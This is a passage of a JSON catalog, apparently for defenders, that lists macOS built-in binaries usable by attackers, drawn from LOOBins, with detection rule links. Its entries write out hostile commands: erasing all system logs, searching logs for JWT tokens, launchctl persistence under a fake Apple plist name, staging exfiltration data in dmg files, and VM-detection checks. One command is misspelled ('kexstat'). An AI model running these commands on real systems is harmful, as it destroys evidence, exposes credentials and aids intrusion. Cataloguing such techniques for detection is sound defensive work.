"mitre": [], 1821 "fullPath": [ 1822 "/usr/bin/dsexport" 1823 ], 1824 "environment": [ 1825 "Local host" 1826 ], 1827 "availability": "Built in", 1828 "verification": "Upstream reference", 1829 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1830 "detection": [ 1831 { 1832 "type": "No detections at time of publishing", 1833 "value": "No detections at time of publishing" 1834 } 1835 ], 1836 "references": [ 1837 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dsexport.yml" 1838 ] 1839 }, 1840 { 1841 "id": "loobins:dsexport:ff2f12c762222565", 1842 "toolId": "loobins:dsexport", 1843 "toolName": "dsexport", 1844 "name": "Export local host groups", 1845 "source": "LOOBins", 1846 "platform": [ 1847 "macOS" 1848 ], 1849 "capability": [ 1850 "Discovery" 1851 ], 1852 "nativeCategory": [ 1853 "Reconnaissance", 1854 "Discovery" 1855 ], 1856 "command": "dsexport local_groups.txt /Local/Default dsRecTypeStandard:Groups", 1857 "description": "Export the local host group information to a file", 1858 "mitre": [], 1859 "fullPath": [ 1860 "/usr/bin/dsexport" 1861 ], 1862 "environment": [ 1863 "Local host" 1864 ], 1865 "availability": "Built in", 1866 "verification": "Upstream reference", 1867 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1868 "detection": [ 1869 { 1870 "type": "No detections at time of publishing", 1871 "value": "No detections at time of publishing" 1872 } 1873 ], 1874 "references": [ 1875 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dsexport.yml" 1876 ] 1877 }, 1878 { 1879 "id": "loobins:funzip:bb11ba6035aeeb1b", 1880 "toolId": "loobins:funzip", 1881 "toolName": "funzip", 1882 "name": "extracts a ZIP or gzip file directly to output from archives or other piped input", 1883 "source": "LOOBins", 1884 "platform": [ 1885 "macOS" 1886 ], 1887 "capability": [ 1888 "Execution" 1889 ], 1890 "nativeCategory": [ 1891 "Execution" 1892 ], 1893 "command": "tail -c <> $0 | funzip -<password>", 1894 "description": "funzip is a macOS utility used to extract ZIP or gzip files directly to output. Malicious binaries misuse funzip, along with head or tail, to extract and reconstruct password-protected malicious payloads.", 1895 "mitre": [], 1896 "fullPath": [ 1897 "/usr/bin/funzip" 1898 ], 1899 "environment": [ 1900 "Local host" 1901 ], 1902 "availability": "Built in", 1903 "verification": "Upstream reference", 1904 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1905 "detection": [ 1906 { 1907 "type": "No detections at time of publishing", 1908 "value": "No detections at time of publishing" 1909 } 1910 ], 1911 "references": [ 1912 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/funzip.yml", 1913 "https://www.uptycs.com/blog/threat-research-report-team/macos-bashed-apples-of-shlayer-and-bundlore", 1914 "https://linux.die.net/man/1/funzip" 1915 ] 1916 }, 1917 { 1918 "id": "loobins:hdiutil:1871b601315b0601", 1919 "toolId": "loobins:hdiutil", 1920 "toolName": "hdiutil", 1921 "name": "Mount a malicious dmg file", 1922 "source": "LOOBins", 1923 "platform": [ 1924 "macOS" 1925 ], 1926 "capability": [ 1927 "Execution" 1928 ], 1929 "nativeCategory": [ 1930 "Execution" 1931 ], 1932 "command": "hdiutil mount malicious.dmg", 1933 "description": "Uses hdiutil to mount a malicious dmg file to the system.", 1934 "mitre": [], 1935 "fullPath": [ 1936 "/usr/bin/hdiutil" 1937 ], 1938 "environment": [ 1939 "Local host" 1940 ], 1941 "availability": "Built in", 1942 "verification": "Upstream reference", 1943 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1944 "detection": [ 1945 { 1946 "type": "Sigma: Disk Image Mounting Via Hdiutil", 1947 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml" 1948 }, 1949 { 1950 "type": "Sigma: Disk Image Creation Via Hdiutil", 1951 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml" 1952 } 1953 ], 1954 "references": [ 1955 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/hdiutil.yml", 1956 "https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/" 1957 ] 1958 }, 1959 { 1960 "id": "loobins:hdiutil:915ec2752516eb85", 1961 "toolId": "loobins:hdiutil", 1962 "toolName": "hdiutil", 1963 "name": "Mount a malicious dmg file", 1964 "source": "LOOBins", 1965 "platform": [ 1966 "macOS" 1967 ], 1968 "capability": [ 1969 "Execution" 1970 ], 1971 "nativeCategory": [ 1972 "Execution" 1973 ], 1974 "command": "hdiutil attach malicious.dmg", 1975 "description": "Uses hdiutil to mount a malicious dmg file to the system.", 1976 "mitre": [], 1977 "fullPath": [ 1978 "/usr/bin/hdiutil" 1979 ], 1980 "environment": [ 1981 "Local host" 1982 ], 1983 "availability": "Built in", 1984 "verification": "Upstream reference", 1985 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1986 "detection": [ 1987 { 1988 "type": "Sigma: Disk Image Mounting Via Hdiutil", 1989 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml" 1990 }, 1991 { 1992 "type": "Sigma: Disk Image Creation Via Hdiutil", 1993 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml" 1994 } 1995 ], 1996 "references": [ 1997 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/hdiutil.yml", 1998 "https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/" 1999 ] 2000 }, 2001 { 2002 "id": "loobins:hdiutil:18567315e0b4f271", 2003 "toolId": "loobins:hdiutil", 2004 "toolName": "hdiutil", 2005 "name": "Mount a malicious iso file", 2006 "source": "LOOBins", 2007 "platform": [ 2008 "macOS" 2009 ], 2010 "capability": [ 2011 "Execution" 2012 ], 2013 "nativeCategory": [ 2014 "Execution" 2015 ], 2016 "command": "hdiutil mount malicious.iso", 2017 "description": "Uses hdiutil to mount a malicious iso file to the system.", 2018 "mitre": [], 2019 "fullPath": [ 2020 "/usr/bin/hdiutil" 2021 ], 2022 "environment": [ 2023 "Local host" 2024 ], 2025 "availability": "Built in", 2026 "verification": "Upstream reference", 2027 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2028 "detection": [ 2029 { 2030 "type": "Sigma: Disk Image Mounting Via Hdiutil", 2031 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml" 2032 }, 2033 { 2034 "type": "Sigma: Disk Image Creation Via Hdiutil", 2035 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml" 2036 } 2037 ], 2038 "references": [ 2039 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/hdiutil.yml", 2040 "https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/" 2041 ] 2042 }, 2043 { 2044 "id": "loobins:hdiutil:ccc86b6f28e110a5", 2045 "toolId": "loobins:hdiutil", 2046 "toolName": "hdiutil", 2047 "name": "Mount a malicious iso file", 2048 "source": "LOOBins", 2049 "platform": [ 2050 "macOS" 2051 ], 2052 "capability": [ 2053 "Execution" 2054 ], 2055 "nativeCategory": [ 2056 "Execution" 2057 ], 2058 "command": "hdiutil attach malicious.iso", 2059 "description": "Uses hdiutil to mount a malicious iso file to the system.", 2060 "mitre": [], 2061 "fullPath": [ 2062 "/usr/bin/hdiutil" 2063 ], 2064 "environment": [ 2065 "Local host" 2066 ], 2067 "availability": "Built in", 2068 "verification": "Upstream reference", 2069 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2070 "detection": [ 2071 { 2072 "type": "Sigma: Disk Image Mounting Via Hdiutil", 2073 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml" 2074 }, 2075 { 2076 "type": "Sigma: Disk Image Creation Via Hdiutil", 2077 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml" 2078 } 2079 ], 2080 "references": [ 2081 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/hdiutil.yml", 2082 "https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/" 2083 ] 2084 }, 2085 { 2086 "id": "loobins:hdiutil:66e95ce99ee93ded", 2087 "toolId": "loobins:hdiutil", 2088 "toolName": "hdiutil", 2089 "name": "Exfiltrate data in dmg file", 2090 "source": "LOOBins", 2091 "platform": [ 2092 "macOS" 2093 ], 2094 "capability": [ 2095 "Collection" 2096 ], 2097 "nativeCategory": [ 2098 "Collection" 2099 ], 2100 "command": "hdiutil create -volname \"Volume Name\" -srcfolder /path/to/folder -ov diskimage.dmg", 2101 "description": "Uses hdiutil to create a dmg file to store exfiltrate data", 2102 "mitre": [], 2103 "fullPath": [ 2104 "/usr/bin/hdiutil" 2105 ], 2106 "environment": [ 2107 "Local host" 2108 ], 2109 "availability": "Built in", 2110 "verification": "Upstream reference", 2111 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2112 "detection": [ 2113 { 2114 "type": "Sigma: Disk Image Mounting Via Hdiutil", 2115 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml" 2116 }, 2117 { 2118 "type": "Sigma: Disk Image Creation Via Hdiutil", 2119 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml" 2120 } 2121 ], 2122 "references": [ 2123 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/hdiutil.yml", 2124 "https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/" 2125 ] 2126 }, 2127 { 2128 "id": "loobins:hdiutil:3abba42650076ac3", 2129 "toolId": "loobins:hdiutil", 2130 "toolName": "hdiutil", 2131 "name": "Exfiltrate data in encrypted dmg file", 2132 "source": "LOOBins", 2133 "platform": [ 2134 "macOS" 2135 ], 2136 "capability": [ 2137 "Collection" 2138 ], 2139 "nativeCategory": [ 2140 "Collection" 2141 ], 2142 "command": "hdiutil create -encryption -stdinpass -volname \"Volume Name\" -srcfolder /path/to/folder -ov encrypteddiskimage.dmg", 2143 "description": "Uses hdiutil to create a dmg file to store exfiltrate data", 2144 "mitre": [], 2145 "fullPath": [ 2146 "/usr/bin/hdiutil" 2147 ], 2148 "environment": [ 2149 "Local host" 2150 ], 2151 "availability": "Built in", 2152 "verification": "Upstream reference", 2153 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2154 "detection": [ 2155 { 2156 "type": "Sigma: Disk Image Mounting Via Hdiutil", 2157 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml" 2158 }, 2159 { 2160 "type": "Sigma: Disk Image Creation Via Hdiutil", 2161 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml" 2162 } 2163 ], 2164 "references": [ 2165 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/hdiutil.yml", 2166 "https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/" 2167 ] 2168 }, 2169 { 2170 "id": "loobins:ioreg:dcc33326372b51d5", 2171 "toolId": "loobins:ioreg", 2172 "toolName": "ioreg", 2173 "name": "Use ioreg to check whether the remote macOS screen is locked.", 2174 "source": "LOOBins", 2175 "platform": [ 2176 "macOS" 2177 ], 2178 "capability": [ 2179 "Discovery" 2180 ], 2181 "nativeCategory": [ 2182 "Discovery" 2183 ], 2184 "command": "ioreg -n Root -d1 -a | grep CGSSession", 2185 "description": "The following command will display a list of keys that contain \"CGSSession\". If the key \"CGSSessionScreenIsLocked\" is present, the screen is actively locked.", 2186 "mitre": [], 2187 "fullPath": [ 2188 "/usr/sbin/ioreg" 2189 ], 2190 "environment": [ 2191 "Local host" 2192 ], 2193 "availability": "Built in", 2194 "verification": "Upstream reference", 2195 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2196 "detection": [ 2197 { 2198 "type": "System Information Discovery Using Ioreg", 2199 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml" 2200 }, 2201 { 2202 "type": "Jamf Protect: Ioreg used to detect if the screen is locked", 2203 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/lockscreen_check" 2204 } 2205 ], 2206 "references": [ 2207 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ioreg.yml", 2208 "https://evasions.checkpoint.com/src/MacOS/macos.html", 2209 "https://github.com/cedowens/SwiftBelt-JXA/blob/main/SwiftBelt-JXA.js#520" 2210 ] 2211 }, 2212 { 2213 "id": "loobins:ioreg:b067f0c68c730682", 2214 "toolId": "loobins:ioreg", 2215 "toolName": "ioreg", 2216 "name": "Use ioreg to check whether the host is on a physical machine or a VM", 2217 "source": "LOOBins", 2218 "platform": [ 2219 "macOS" 2220 ], 2221 "capability": [ 2222 "Discovery", 2223 "Collection" 2224 ], 2225 "nativeCategory": [ 2226 "Discovery", 2227 "Collection" 2228 ], 2229 "command": "ioreg -rd1 -c IOPlatformExpertDevice", 2230 "description": "Check the output of this command (specifically the IOPlatformSerialNumber, board-id, and manufacturer fields) to check whether or not this host is in a virtual machine.", 2231 "mitre": [], 2232 "fullPath": [ 2233 "/usr/sbin/ioreg" 2234 ], 2235 "environment": [ 2236 "Local host" 2237 ], 2238 "availability": "Built in", 2239 "verification": "Upstream reference", 2240 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2241 "detection": [ 2242 { 2243 "type": "System Information Discovery Using Ioreg", 2244 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml" 2245 }, 2246 { 2247 "type": "Jamf Protect: Ioreg used to detect if the screen is locked", 2248 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/lockscreen_check" 2249 } 2250 ], 2251 "references": [ 2252 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ioreg.yml", 2253 "https://evasions.checkpoint.com/src/MacOS/macos.html", 2254 "https://github.com/cedowens/SwiftBelt-JXA/blob/main/SwiftBelt-JXA.js#520" 2255 ] 2256 }, 2257 { 2258 "id": "loobins:ioreg:cd37720e15a402b9", 2259 "toolId": "loobins:ioreg", 2260 "toolName": "ioreg", 2261 "name": "Use ioreg to check USB device vendor names", 2262 "source": "LOOBins", 2263 "platform": [ 2264 "macOS" 2265 ], 2266 "capability": [ 2267 "Discovery", 2268 "Collection" 2269 ], 2270 "nativeCategory": [ 2271 "Discovery", 2272 "Collection" 2273 ], 2274 "command": "ioreg -rd1 -c IOUSBHostDevice", 2275 "description": "Grep for \"USB Vendor Name\" values to view USB vendor names. On virtualized hardware these values may contain the hypervisor name such as \"VirtualBox\". This is an additional way to check for virtualization.", 2276 "mitre": [], 2277 "fullPath": [ 2278 "/usr/sbin/ioreg" 2279 ], 2280 "environment": [ 2281 "Local host" 2282 ], 2283 "availability": "Built in", 2284 "verification": "Upstream reference", 2285 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2286 "detection": [ 2287 { 2288 "type": "System Information Discovery Using Ioreg", 2289 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml" 2290 }, 2291 { 2292 "type": "Jamf Protect: Ioreg used to detect if the screen is locked", 2293 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/lockscreen_check" 2294 } 2295 ], 2296 "references": [ 2297 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ioreg.yml", 2298 "https://evasions.checkpoint.com/src/MacOS/macos.html", 2299 "https://github.com/cedowens/SwiftBelt-JXA/blob/main/SwiftBelt-JXA.js#520" 2300 ] 2301 }, 2302 { 2303 "id": "loobins:ioreg:fbb090f474aa6ca4", 2304 "toolId": "loobins:ioreg", 2305 "toolName": "ioreg", 2306 "name": "Check all ioreg properties for hypervisor names.", 2307 "source": "LOOBins", 2308 "platform": [ 2309 "macOS" 2310 ], 2311 "capability": [ 2312 "Discovery", 2313 "Collection" 2314 ], 2315 "nativeCategory": [ 2316 "Discovery", 2317 "Collection" 2318 ], 2319 "command": "ioreg -l", 2320 "description": "Grep for \"virtual box\", \"oracle\", and \"vmware\" from the output of the ioreg -l command. This is an additional way to check for virtualization.", 2321 "mitre": [], 2322 "fullPath": [ 2323 "/usr/sbin/ioreg" 2324 ], 2325 "environment": [ 2326 "Local host" 2327 ], 2328 "availability": "Built in", 2329 "verification": "Upstream reference", 2330 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2331 "detection": [ 2332 { 2333 "type": "System Information Discovery Using Ioreg", 2334 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml" 2335 }, 2336 { 2337 "type": "Jamf Protect: Ioreg used to detect if the screen is locked", 2338 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/lockscreen_check" 2339 } 2340 ], 2341 "references": [ 2342 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ioreg.yml", 2343 "https://evasions.checkpoint.com/src/MacOS/macos.html", 2344 "https://github.com/cedowens/SwiftBelt-JXA/blob/main/SwiftBelt-JXA.js#520" 2345 ] 2346 }, 2347 { 2348 "id": "loobins:kextstat:c2c6f26bdef46a47", 2349 "toolId": "loobins:kextstat", 2350 "toolName": "kextstat", 2351 "name": "List kernel extensions", 2352 "source": "LOOBins", 2353 "platform": [ 2354 "macOS" 2355 ], 2356 "capability": [ 2357 "Discovery" 2358 ], 2359 "nativeCategory": [ 2360 "Discovery" 2361 ], 2362 "command": "kexstat", 2363 "description": "Uses kexstat showloaded to display kernel extensions and address in kernel memory it has been loaded", 2364 "mitre": [], 2365 "fullPath": [ 2366 "/usr/sbin/kextstat" 2367 ], 2368 "environment": [ 2369 "Local host" 2370 ], 2371 "availability": "Built in", 2372 "verification": "Upstream reference", 2373 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2374 "detection": [ 2375 { 2376 "type": "No detections at time of publishing", 2377 "value": "No detections at time of publishing" 2378 } 2379 ], 2380 "references": [ 2381 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/kextstat.yml", 2382 "https://ss64.com/osx/kextstat.html" 2383 ] 2384 }, 2385 { 2386 "id": "loobins:last:6dcde1a1bfcae0a2", 2387 "toolId": "loobins:last", 2388 "toolName": "last", 2389 "name": "Enumerate the users who are currently logged into the system.", 2390 "source": "LOOBins", 2391 "platform": [ 2392 "macOS" 2393 ], 2394 "capability": [ 2395 "Discovery" 2396 ], 2397 "nativeCategory": [ 2398 "Discovery" 2399 ], 2400 "command": "last | grep \"still logged in\"", 2401 "description": "The following command will display sessions that are currently active.", 2402 "mitre": [], 2403 "fullPath": [ 2404 "/usr/bin/last" 2405 ], 2406 "environment": [ 2407 "Local host" 2408 ], 2409 "availability": "Built in", 2410 "verification": "Upstream reference", 2411 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2412 "detection": [ 2413 { 2414 "type": "System Network Connections Discovery", 2415 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml" 2416 } 2417 ], 2418 "references": [ 2419 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/last.yml", 2420 "https://ss64.com/osx/last.html" 2421 ] 2422 }, 2423 { 2424 "id": "loobins:last:ed7e3de067377640", 2425 "toolId": "loobins:last", 2426 "toolName": "last", 2427 "name": "Enumerate all user accounts that have logged into the system previously.", 2428 "source": "LOOBins", 2429 "platform": [ 2430 "macOS" 2431 ], 2432 "capability": [ 2433 "Discovery" 2434 ], 2435 "nativeCategory": [ 2436 "Discovery" 2437 ], 2438 "command": "last -t console", 2439 "description": "The last command can be used to output users who have previously logged in, by specifying the tty interface 'console'.", 2440 "mitre": [], 2441 "fullPath": [ 2442 "/usr/bin/last" 2443 ], 2444 "environment": [ 2445 "Local host" 2446 ], 2447 "availability": "Built in", 2448 "verification": "Upstream reference", 2449 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2450 "detection": [ 2451 { 2452 "type": "System Network Connections Discovery", 2453 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml" 2454 } 2455 ], 2456 "references": [ 2457 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/last.yml", 2458 "https://ss64.com/osx/last.html" 2459 ] 2460 }, 2461 { 2462 "id": "loobins:last:5ba5734955e17f30", 2463 "toolId": "loobins:last", 2464 "toolName": "last", 2465 "name": "Enumerate all hosts that have remotely logged into the system before.", 2466 "source": "LOOBins", 2467 "platform": [ 2468 "macOS" 2469 ], 2470 "capability": [ 2471 "Discovery" 2472 ], 2473 "nativeCategory": [ 2474 "Discovery" 2475 ], 2476 "command": "last | grep -E '[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+'", 2477 "description": "An attacker can use 'last' with a filter to retrieve the connection date and remote host information for remote logins.", 2478 "mitre": [], 2479 "fullPath": [ 2480 "/usr/bin/last" 2481 ], 2482 "environment": [ 2483 "Local host" 2484 ], 2485 "availability": "Built in", 2486 "verification": "Upstream reference", 2487 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2488 "detection": [ 2489 { 2490 "type": "System Network Connections Discovery", 2491 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml" 2492 } 2493 ], 2494 "references": [ 2495 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/last.yml", 2496 "https://ss64.com/osx/last.html" 2497 ] 2498 }, 2499 { 2500 "id": "loobins:launchctl:cab792e5e586c548", 2501 "toolId": "loobins:launchctl", 2502 "toolName": "launchctl", 2503 "name": "Use launchctl to execute an application", 2504 "source": "LOOBins", 2505 "platform": [ 2506 "macOS" 2507 ], 2508 "capability": [ 2509 "Execution", 2510 "Persistence" 2511 ], 2512 "nativeCategory": [ 2513 "Execution", 2514 "Persistence" 2515 ], 2516 "command": "sudo launchctl load /Library/LaunchAgent/com.apple.installer", 2517 "description": "A oneliner that will load a plist as a LaunchAgent or LaunchDaemon, achieving persistence on a target machine. This command requires root privileges.", 2518 "mitre": [], 2519 "fullPath": [ 2520 "/bin/launchctl" 2521 ], 2522 "environment": [ 2523 "Local host" 2524 ], 2525 "availability": "Built in", 2526 "verification": "Upstream reference", 2527 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2528 "detection": [ 2529 { 2530 "type": "LaunchAgents and LaunchDaemons must have a plist file on disk in the root, system, or user Library directory. Monitoring for plist's with executables located in /tmp or /Shared could identify suspicious applications.", 2531 "value": "LaunchAgents and LaunchDaemons must have a plist file on disk in the root, system, or user Library directory. Monitoring for plist's with executables located in /tmp or /Shared could identify suspicious applications." 2532 }, 2533 { 2534 "type": "Jamf Protect: Detect launchctl activity that unloads or bootsout specific service", 2535 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/launchctl_unload_and_bootout_events" 2536 } 2537 ], 2538 "references": [ 2539 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/launchctl.yml", 2540 "https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/", 2541 "https://attack.mitre.org/techniques/T1569/001/", 2542 "https://attack.mitre.org/techniques/T1543/001/", 2543 "https://unit42.paloaltonetworks.com/unit42-sofacys-komplex-os-x-trojan/" 2544 ] 2545 }, 2546 { 2547 "id": "loobins:launchctl:e0168ff2595cd079", 2548 "toolId": "loobins:launchctl", 2549 "toolName": "launchctl", 2550 "name": "Persistent launch agent", 2551 "source": "LOOBins", 2552 "platform": [ 2553 "macOS" 2554 ], 2555 "capability": [ 2556 "Persistence" 2557 ], 2558 "nativeCategory": [ 2559 "Persistence" 2560 ], 2561 "command": "launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist", 2562 "description": "Creation of a persistent launch agent called with $HOME/Library/LaunchAgents/com.apple.updates.plist", 2563 "mitre": [], 2564 "fullPath": [ 2565 "/bin/launchctl" 2566 ], 2567 "environment": [ 2568 "Local host" 2569 ], 2570 "availability": "Built in", 2571 "verification": "Upstream reference", 2572 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2573 "detection": [ 2574 { 2575 "type": "LaunchAgents and LaunchDaemons must have a plist file on disk in the root, system, or user Library directory. Monitoring for plist's with executables located in /tmp or /Shared could identify suspicious applications.", 2576 "value": "LaunchAgents and LaunchDaemons must have a plist file on disk in the root, system, or user Library directory. Monitoring for plist's with executables located in /tmp or /Shared could identify suspicious applications." 2577 }, 2578 { 2579 "type": "Jamf Protect: Detect launchctl activity that unloads or bootsout specific service", 2580 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/launchctl_unload_and_bootout_events" 2581 } 2582 ], 2583 "references": [ 2584 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/launchctl.yml", 2585 "https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/", 2586 "https://attack.mitre.org/techniques/T1569/001/", 2587 "https://attack.mitre.org/techniques/T1543/001/", 2588 "https://unit42.paloaltonetworks.com/unit42-sofacys-komplex-os-x-trojan/" 2589 ] 2590 }, 2591 { 2592 "id": "loobins:log:32d51b69b7129486", 2593 "toolId": "loobins:log", 2594 "toolName": "log", 2595 "name": "Remove all log messages", 2596 "source": "LOOBins", 2597 "platform": [ 2598 "macOS" 2599 ], 2600 "capability": [ 2601 "Defense Evasion" 2602 ], 2603 "nativeCategory": [ 2604 "Defense Evasion" 2605 ], 2606 "command": "log erase --all", 2607 "description": "An attacker can cover up their tracks by removing all log messages using the following command. Requires root privileges.", 2608 "mitre": [], 2609 "fullPath": [ 2610 "/usr/bin/log" 2611 ], 2612 "environment": [ 2613 "Local host" 2614 ], 2615 "availability": "Built in", 2616 "verification": "Upstream reference", 2617 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2618 "detection": [ 2619 { 2620 "type": "No detections at time of publishing", 2621 "value": "No detections at time of publishing" 2622 } 2623 ], 2624 "references": [ 2625 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/log.yml", 2626 "https://shellcromancer.io/posts/living-off-of-macos/" 2627 ] 2628 }, 2629 { 2630 "id": "loobins:log:4e78bd2f52cfc999", 2631 "toolId": "loobins:log", 2632 "toolName": "log", 2633 "name": "Search log messages for tokens", 2634 "source": "LOOBins", 2635 "platform": [ 2636 "macOS" 2637 ], 2638 "capability": [ 2639 "Credential Access" 2640 ], 2641 "nativeCategory": [ 2642 "Credential Access" 2643 ], 2644 "command": "log show --info --debug --predicate 'eventMessage CONTAINS[d] \"eyJ\"'", 2645 "description": "An attacker can potentially search log messages and review if they do contain sensitive information like jwt tokens.", 2646 "mitre": [], 2647 "fullPath": [ 2648 "/usr/bin/log" 2649 ], 2650 "environment": [ 2651 "Local host" 2652 ], 2653 "availability": "Built in", 2654 "verification": "Upstream reference", 2655 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2656 "detection": [ 2657 { 2658 "type": "No detections at time of publishing", 2659 "value": "No detections at time of publishing" 2660 } 2661 ], 2662 "references": [ 2663 